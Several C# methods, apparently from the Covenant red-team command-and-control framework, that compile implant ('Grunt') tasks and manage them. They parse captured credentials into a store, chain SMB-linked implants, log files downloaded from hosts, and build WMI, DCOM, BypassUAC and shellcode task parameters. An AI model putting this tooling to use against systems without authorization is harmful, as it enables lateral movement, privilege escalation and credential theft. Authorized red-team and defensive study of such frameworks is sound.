public byte[] CompileExe(GruntTask task, Common.DotNetVersion version, OutputKind outputKind, Boolean Compress) { byte[] ILBytes = null; if (version == Common.DotNetVersion.Net35 || version == Common.DotNetVersion.Net40) { List <Compiler.Reference> references = null; switch (version) { case Common.DotNetVersion.Net35: references = Common.DefaultNet35References; break; case Common.DotNetVersion.Net40: references = Common.DefaultNet40References; break; } ILBytes = Compiler.Compile(new Compiler.CsharpFrameworkCompilationRequest { Language = task.Language, Source = task.Code, TargetDotNetVersion = version, OutputKind = outputKind, References = references }); } else if (version == Common.DotNetVersion.NetCore31) { string src = task.Code; string sanitizedName = Utilities.GetSanitizedFilename(task.Name); string dir = Common.CovenantDataDirectory + "Grunt" + Path.DirectorySeparatorChar + sanitizedName + Path.DirectorySeparatorChar; string ResultName; /*if (template.StagerCode == CodeTemplate) * { * ResultName = sanitizedName + "Stager"; * dir += sanitizedName + "Stager" + Path.DirectorySeparatorChar; * string file = sanitizedName + "Stager" + Utilities.GetExtensionForLanguage(template.Language); * File.WriteAllText(dir + file, src); * }*/ if (true) { ResultName = sanitizedName; dir += sanitizedName + Path.DirectorySeparatorChar; string file = sanitizedName + Utilities.GetExtensionForLanguage(task.Language); File.WriteAllText(dir + file, src); } ILBytes = Compiler.Compile(new Compiler.CsharpCoreCompilationRequest { ResultName = ResultName, Language = task.Language, TargetDotNetVersion = version, SourceDirectory = dir, OutputKind = outputKind, //update this to not be hardcoded RuntimeIdentifier = Compiler.RuntimeIdentifier.win_x64, UseSubprocess = true }); } if (ILBytes == null || ILBytes.Length == 0) { throw new CovenantCompileGruntStagerFailedException("Compiling Grunt code failed"); } if (Compress) { ILBytes = Utilities.Compress(ILBytes); } return(ILBytes); }
public ActionResult <GruntTasking> EditGruntTasking(int id, int tid, [FromBody] GruntTasking gruntTasking) { Grunt grunt = _context.Grunts.FirstOrDefault(G => G.Id == id); if (grunt == null) { return(NotFound($"NotFound - Grunt with id: {id}")); } GruntTasking updatingGruntTasking = _context.GruntTaskings.FirstOrDefault(GT => grunt.Id == GT.GruntId && tid == GT.Id); if (updatingGruntTasking == null) { return(NotFound($"NotFound - GruntTasking with id: {tid}")); } GruntTask gruntTask = _context.GruntTasks.FirstOrDefault(G => G.Id == gruntTasking.TaskId); if (gruntTask == null) { return(NotFound($"NotFound - GruntTask with id: {gruntTasking.TaskId}")); } GruntTask DownloadTask = _context.GruntTasks.FirstOrDefault(GT => GT.Name == "Download"); if (DownloadTask == null) { return(NotFound($"NotFound - GruntTask DownloadTask")); } List <CapturedCredential> capturedCredentials = CapturedCredential.ParseCredentials(gruntTasking.GruntTaskOutput); foreach (CapturedCredential cred in capturedCredentials) { if (!ContextContainsCredentials(cred)) { _context.Credentials.Add(cred); _context.SaveChanges(); } } GruntTaskingStatus newStatus = gruntTasking.Status; GruntTaskingStatus originalStatus = updatingGruntTasking.Status; if ((originalStatus == GruntTaskingStatus.Tasked || originalStatus == GruntTaskingStatus.Progressed) && newStatus == GruntTaskingStatus.Completed) { if (gruntTasking.Type == GruntTaskingType.Kill) { grunt.Status = Grunt.GruntStatus.Killed; } else if (gruntTasking.Type == GruntTaskingType.SetDelay || gruntTasking.Type == GruntTaskingType.SetJitter || gruntTasking.Type == GruntTaskingType.SetConnectAttempts) { bool parsed = int.TryParse(gruntTasking.TaskingMessage, out int n); if (parsed) { if (gruntTasking.Type == GruntTaskingType.SetDelay) { grunt.Delay = n; } else if (gruntTasking.Type == GruntTaskingType.SetJitter) { grunt.JitterPercent = n; } else if (gruntTasking.Type == GruntTaskingType.SetConnectAttempts) { grunt.ConnectAttempts = n; } } } else if (gruntTasking.Type == GruntTaskingType.Connect) { if (originalStatus == GruntTaskingStatus.Tasked) { // Check if this Grunt was already connected string hostname = gruntTasking.GruntTaskingMessage.Message.Split(",")[0]; string pipename = gruntTasking.GruntTaskingMessage.Message.Split(",")[1]; Grunt previouslyConnectedGrunt = _context.Grunts.FirstOrDefault(G => G.CommType == Grunt.CommunicationType.SMB && (G.IPAddress == hostname || G.Hostname == hostname) && G.SMBPipeName == pipename && (G.Status == Grunt.GruntStatus.Disconnected || G.Status == Grunt.GruntStatus.Lost || G.Status == Grunt.GruntStatus.Active) ); if (previouslyConnectedGrunt != null) { if (previouslyConnectedGrunt.Status != Grunt.GruntStatus.Disconnected) { // If already connected, disconnect to avoid cycles Grunt previouslyConnectedGruntPrevParent = null; foreach (Grunt g in _context.Grunts) { if (g.Children.Contains(previouslyConnectedGrunt.GUID)) { previouslyConnectedGruntPrevParent = g; } } if (previouslyConnectedGruntPrevParent != null) { previouslyConnectedGruntPrevParent.RemoveChild(previouslyConnectedGrunt); _context.Grunts.Update(previouslyConnectedGruntPrevParent); } } // Connect to tasked Grunt, no need to "Progress", as Grunt is already staged grunt.AddChild(previouslyConnectedGrunt); previouslyConnectedGrunt.Status = Grunt.GruntStatus.Active; _context.Grunts.Update(previouslyConnectedGrunt); } else { // If not already connected, the Grunt is going to stage, set status to Progressed newStatus = GruntTaskingStatus.Progressed; } } else if (originalStatus == GruntTaskingStatus.Progressed) { // Connecting Grunt has staged, add as Child string hostname = gruntTasking.GruntTaskingMessage.Message.Split(",")[0]; string pipename = gruntTasking.GruntTaskingMessage.Message.Split(",")[1]; Grunt stagingGrunt = _context.Grunts.FirstOrDefault(G => G.CommType == Grunt.CommunicationType.SMB && ((G.IPAddress == hostname || G.Hostname == hostname) || (G.IPAddress == "" && G.Hostname == "")) && G.SMBPipeName == pipename && G.Status == Grunt.GruntStatus.Stage0 ); if (stagingGrunt == null) { return(NotFound($"NotFound - Grunt staging from {hostname}:{pipename}")); } grunt.AddChild(stagingGrunt); } } else if (gruntTasking.Type == GruntTaskingType.Disconnect) { Grunt disconnectFromGrunt = _context.Grunts.FirstOrDefault(G => G.GUID == gruntTasking.GruntTaskingMessage.Message); if (disconnectFromGrunt == null) { return(NotFound($"NotFound - Grunt with GUID: {gruntTasking.GruntTaskingMessage.Message}")); } disconnectFromGrunt.Status = Grunt.GruntStatus.Disconnected; _context.Grunts.Update(disconnectFromGrunt); grunt.RemoveChild(disconnectFromGrunt); } } if ((newStatus == GruntTaskingStatus.Completed || newStatus == GruntTaskingStatus.Progressed) && originalStatus != newStatus) { if (newStatus == GruntTaskingStatus.Completed) { updatingGruntTasking.CompletionTime = DateTime.UtcNow; } string verb = newStatus == GruntTaskingStatus.Completed ? "completed" : "progressed"; if (gruntTasking.TaskId == DownloadTask.Id) { _context.Events.Add(new Event { Time = updatingGruntTasking.CompletionTime, MessageHeader = "[" + updatingGruntTasking.CompletionTime + " UTC] Grunt: " + grunt.Name + " has " + verb + " GruntTasking: " + gruntTasking.Name, Level = Event.EventLevel.Highlight, Context = grunt.Name }); string FileName = Common.CovenantEncoding.GetString(Convert.FromBase64String(gruntTasking.TaskingMessage.Split(",")[1])); DownloadEvent downloadEvent = new DownloadEvent { Time = updatingGruntTasking.CompletionTime, MessageHeader = "Downloaded: " + FileName + "\r\n" + "Syncing to Elite...", Level = Event.EventLevel.Highlight, Context = grunt.Name, FileName = FileName, FileContents = gruntTasking.GruntTaskOutput, Progress = DownloadEvent.DownloadProgress.Complete }; downloadEvent.WriteToDisk(); _context.Events.Add(downloadEvent); } else { _context.Events.Add(new Event { Time = updatingGruntTasking.CompletionTime, MessageHeader = "[" + updatingGruntTasking.CompletionTime + " UTC] Grunt: " + grunt.Name + " has " + verb + " GruntTasking: " + gruntTasking.Name, MessageBody = "(" + gruntTasking.TaskingUser + ") > " + gruntTasking.TaskingCommand + Environment.NewLine + gruntTasking.GruntTaskOutput, Level = Event.EventLevel.Highlight, Context = grunt.Name }); } } updatingGruntTasking.Status = newStatus; updatingGruntTasking.GruntTaskOutput = gruntTasking.GruntTaskOutput; _context.GruntTaskings.Update(updatingGruntTasking); _context.Grunts.Update(grunt); _context.SaveChanges(); return(updatingGruntTasking); }
//Use this for starting the server public static void StartServer(EmpireService service) { DbInitializer.Initialize(service); List <GruntTask> tsks = service.GetEmpire().gruntTasks; //arbitrary buffer size. This may need to change in the future byte[] buffer = new byte[10000000]; IPEndPoint localEndPoint = new IPEndPoint(IPAddress.Parse("127.0.0.1"), 2012); Socket listener = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); listener.Bind(localEndPoint); listener.Listen(100); while (true) { Console.WriteLine("Compiler ready"); Socket socket = listener.Accept(); int bytesRec = socket.Receive(buffer); //interpret the message var data = Encoding.ASCII.GetString(buffer, 0, bytesRec); string[] recMessage = data.Split(","); //Data is sent with the TaskName first and then var bytesTaskName = Convert.FromBase64String(recMessage[0]); var bytesYAML = Convert.FromBase64String(recMessage[1]); string strTaskName = Encoding.UTF8.GetString(bytesTaskName); string strYAML = Encoding.UTF8.GetString(bytesYAML); // Initialize the task from the passed YAML DbInitializer.IngestTask(service, strYAML); tsks = service.GetEmpire().gruntTasks; try { if (strTaskName != "close") { GruntTask tsk = tsks.First(tk => tk.Name == strTaskName); var chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; var stringChars = new char[5]; var random = new Random(); for (int i = 0; i < stringChars.Length; i++) { stringChars[i] = chars[random.Next(chars.Length)]; } var randNew = new String(stringChars); tsk.Name = tsk.Name + "_" + randNew; tsk.Compile(); string message = "FileName:" + tsk.Name; var msgBytes = Encoding.ASCII.GetBytes(message); socket.Send(msgBytes); } else { socket.Close(); break; } } catch (Exception e) { string message = "Compile failed"; var msgBytes = Encoding.ASCII.GetBytes(message); socket.Send(msgBytes); Console.WriteLine(e.ToString()); } } }
public async Task <ActionResult <GruntTask> > CreateGruntTask([FromBody] GruntTask task) { GruntTask savedTask = await _context.CreateGruntTask(task); return(CreatedAtRoute(nameof(GetGruntTask), new { id = savedTask.Id }, savedTask)); }
public ActionResult <GruntTasking> CreateGruntTasking(int id, [FromBody] GruntTasking gruntTasking) { Grunt grunt = _context.Grunts.FirstOrDefault(G => G.Id == id); if (grunt == null) { return(NotFound()); } if (gruntTasking.type == GruntTasking.GruntTaskingType.Assembly) { GruntTask task = _context.GruntTasks.FirstOrDefault(T => T.Id == gruntTasking.TaskId); if (task == null) { return(NotFound()); } task.Options = _context.GruntTaskOptions.Where(O => O.TaskId == task.Id).ToList(); List <string> parameters = task.Options.OrderBy(O => O.OptionId).Select(O => O.Value).ToList(); if (task.Name.ToLower() == "wmi") { Launcher l = _context.Launchers.FirstOrDefault(L => L.Name.ToLower() == parameters[3].ToLower()); if ((parameters[4] != null && parameters[4] != "") || l == null || l.LauncherString == null || l.LauncherString.Trim() == "") { // If using custom command // Remove the "Launcher" parameter parameters.RemoveAt(3); } else { // If using Launcher // Remove the "Command" parameter parameters.RemoveAt(4); // Set LauncherString to WMI command parameter parameters[3] = l.LauncherString; } } else if (task.Name.ToLower() == "dcom") { Launcher l = _context.Launchers.FirstOrDefault(L => L.Name.ToLower() == parameters[1].ToLower()); if ((parameters[2] != null && parameters[2] != "") || l == null || l.LauncherString == null || l.LauncherString.Trim() == "") { // If using custom command // Remove the "Launcher" parameter parameters.RemoveAt(1); // Add .exe exetension if needed List <string> split = parameters[1].Split(" ").ToList(); parameters[1] = split[0]; if (!parameters[1].EndsWith(".exe")) { parameters[1] += ".exe"; } split.RemoveAt(0); parameters.Insert(2, String.Join(" ", split.ToArray())); string Directory = "C:\\WINDOWS\\System32\\"; if (parameters[1].ToLower().Contains("powershell.exe")) { Directory += "WindowsPowerShell\\v1.0\\"; } else if (parameters[1].ToLower().Contains("wmic.exe")) { Directory += "wbem\\"; } parameters.Insert(3, Directory); } else { // If using Launcher // Remove the "Command" parameter parameters.RemoveAt(2); // Set LauncherString to DCOM command parameter parameters[1] = l.LauncherString; // Add .exe exetension if needed List <string> split = parameters[1].Split(" ").ToList(); parameters[1] = split[0]; if (!parameters[1].EndsWith(".exe")) { parameters[1] += ".exe"; } split.RemoveAt(0); parameters.Insert(2, String.Join(" ", split.ToArray())); string Directory = "C:\\WINDOWS\\System32\\"; if (parameters[1].ToLower().Contains("powershell.exe")) { Directory += "WindowsPowerShell\\v1.0\\"; } else if (parameters[1].ToLower().Contains("wmic.exe")) { Directory += "wbem\\"; } parameters.Insert(3, Directory); } } else if (task.Name.ToLower() == "bypassuac") { Launcher l = _context.Launchers.FirstOrDefault(L => L.Name.ToLower() == parameters[0].ToLower()); if ((parameters[1] != null && parameters[1] != "") || l == null || l.LauncherString == null || l.LauncherString.Trim() == "") { // If using custom command // Remove the "Launcher" parameter parameters.RemoveAt(0); // Add .exe exetension if needed string[] split = parameters[0].Split(" "); parameters[0] = split.FirstOrDefault(); if (!parameters[0].EndsWith(".exe")) { parameters[0] += ".exe"; } // Add parameters needed for BypassUAC Task parameters.Add(String.Join(" ", split.ToList().GetRange(1, split.Count() - 1))); parameters.Add("C:\\WINDOWS\\System32\\"); if (parameters[0].ToLower().Contains("powershell.exe")) { parameters[2] += "WindowsPowerShell\\v1.0\\"; } else if (parameters[0].ToLower().Contains("wmic.exe")) { parameters[2] += "wbem\\"; } parameters.Add("0"); } else { // If using Launcher // Remove the "Command" parameter parameters.RemoveAt(1); // Add .exe exetension if needed string[] split = l.LauncherString.Split(" "); parameters[0] = split.FirstOrDefault(); if (!parameters[0].EndsWith(".exe")) { parameters[0] += ".exe"; } // Add parameters need for BypassUAC Task parameters.Add(String.Join(" ", split.ToList().GetRange(1, split.Count() - 1))); parameters.Add("C:\\WINDOWS\\System32\\"); if (l.Name.ToLower() == "powershell") { parameters[2] += "WindowsPowerShell\\v1.0\\"; } else if (l.Name.ToLower() == "wmic") { parameters[2] += "wbem\\"; } parameters.Add("0"); } } try { gruntTasking.Compile( task.Code, parameters, task.GetReferenceAssemblies(), task.GetReferenceSourceLibraries(), task.GetEmbeddedResources(), grunt.DotNetFrameworkVersion ); } catch (Exception e) { Console.Error.WriteLine("Task Compilation failed: " + e.Message + e.StackTrace); return(BadRequest("Task returned compilation errors:" + e.Message + e.StackTrace)); } } _context.GruntTaskings.Add(gruntTasking); _context.SaveChanges(); return(CreatedAtRoute(nameof(GetGruntTasking), new { id = id, taskname = gruntTasking.Name }, gruntTasking)); }
public async Task <string> ParseParametersIntoTask(GruntTask task, List <ParsedParameter> parameters) { return(null); }
public async Task <string> Set(Grunt grunt, GruntCommand command, List <ParsedParameter> parameters) { if (parameters.Count != 3) { return(EliteConsole.PrintFormattedErrorLine("Usage: Set (Delay | JitterPercent | ConnectAttempts) <value>")); } if (int.TryParse(parameters[2].Value, out int n)) { GruntTask setTask = await _context.GetGruntTaskByName("Set"); if (parameters[1].Value.Equals("delay", StringComparison.OrdinalIgnoreCase)) { grunt.Delay = n; await _context.CreateGruntTasking(new GruntTasking { Id = 0, GruntId = grunt.Id, Grunt = grunt, GruntTaskId = setTask.Id, GruntTask = setTask, Status = GruntTaskingStatus.Uninitialized, Type = GruntTaskingType.SetDelay, Parameters = new List <string> { grunt.Delay.ToString() }, GruntCommand = command, GruntCommandId = command.Id }, _grunthub); } else if (parameters[1].Value.Equals("jitterpercent", StringComparison.OrdinalIgnoreCase)) { grunt.JitterPercent = n; await _context.CreateGruntTasking(new GruntTasking { Id = 0, GruntId = grunt.Id, Grunt = grunt, GruntTaskId = setTask.Id, GruntTask = setTask, Status = GruntTaskingStatus.Uninitialized, Type = GruntTaskingType.SetJitter, Parameters = new List <string> { grunt.JitterPercent.ToString() }, GruntCommand = command, GruntCommandId = command.Id }, _grunthub); } else if (parameters[1].Value.Equals("connectattempts", StringComparison.OrdinalIgnoreCase)) { grunt.ConnectAttempts = n; await _context.CreateGruntTasking(new GruntTasking { Id = 0, GruntId = grunt.Id, Grunt = grunt, GruntTaskId = setTask.Id, GruntTask = setTask, Status = GruntTaskingStatus.Uninitialized, Type = GruntTaskingType.SetConnectAttempts, Parameters = new List <string> { grunt.ConnectAttempts.ToString() }, GruntCommand = command, GruntCommandId = command.Id }, _grunthub); } return(""); } return(EliteConsole.PrintFormattedErrorLine("Usage: Set (Delay | JitterPercent | ConnectAttempts) <value>")); }
private static MenuCommand GetTaskMenuSetCommand(GruntTask task, CovenantAPI CovenantClient) { List <MenuCommandParameterValue> DefaultOptions = task.Options.Select(O => new MenuCommandParameterValue { Value = O.Name }).ToList(); switch (task.Name) { case "Assembly": return(new MenuCommandAssemblyTaskSet(CovenantClient) { Name = "Set", Description = "Set AssemblyTask option", Parameters = new List <MenuCommandParameter> { new MenuCommandParameter { Name = "Option", Values = DefaultOptions.Append( new MenuCommandParameterValue { Value = "AssemblyPath", NextValueSuggestions = Utilities.GetFilesForPath(Common.EliteDataFolder) } ).ToList() }, new MenuCommandParameter { Name = "Value" } } }); case "Upload": return(new MenuCommandUploadTaskSet(CovenantClient) { Name = "Set", Description = "Set Upload option", Parameters = new List <MenuCommandParameter> { new MenuCommandParameter { Name = "Option", Values = DefaultOptions.Append( new MenuCommandParameterValue { Value = "FilePath", NextValueSuggestions = Utilities.GetFilesForPath(Common.EliteDataFolder) } ).ToList() }, new MenuCommandParameter { Name = "Value" } } }); case "ShellCode": return(new MenuCommandShellCodeTaskSet(CovenantClient) { Name = "Set", Description = "Set ShellCode option", Parameters = new List <MenuCommandParameter> { new MenuCommandParameter { Name = "Option", Values = DefaultOptions.Append( new MenuCommandParameterValue { Value = "ShellcodeBinFilePath", NextValueSuggestions = Utilities.GetFilesForPath(Common.EliteDataFolder) } ).ToList() }, new MenuCommandParameter { Name = "Value" } } }); default: return(new MenuCommandTaskSet(CovenantClient) { Name = "Set", Description = "Set " + task.Name + " option", Parameters = new List <MenuCommandParameter> { new MenuCommandParameter { Name = "Option", Values = DefaultOptions }, new MenuCommandParameter { Name = "Value" } } }); } }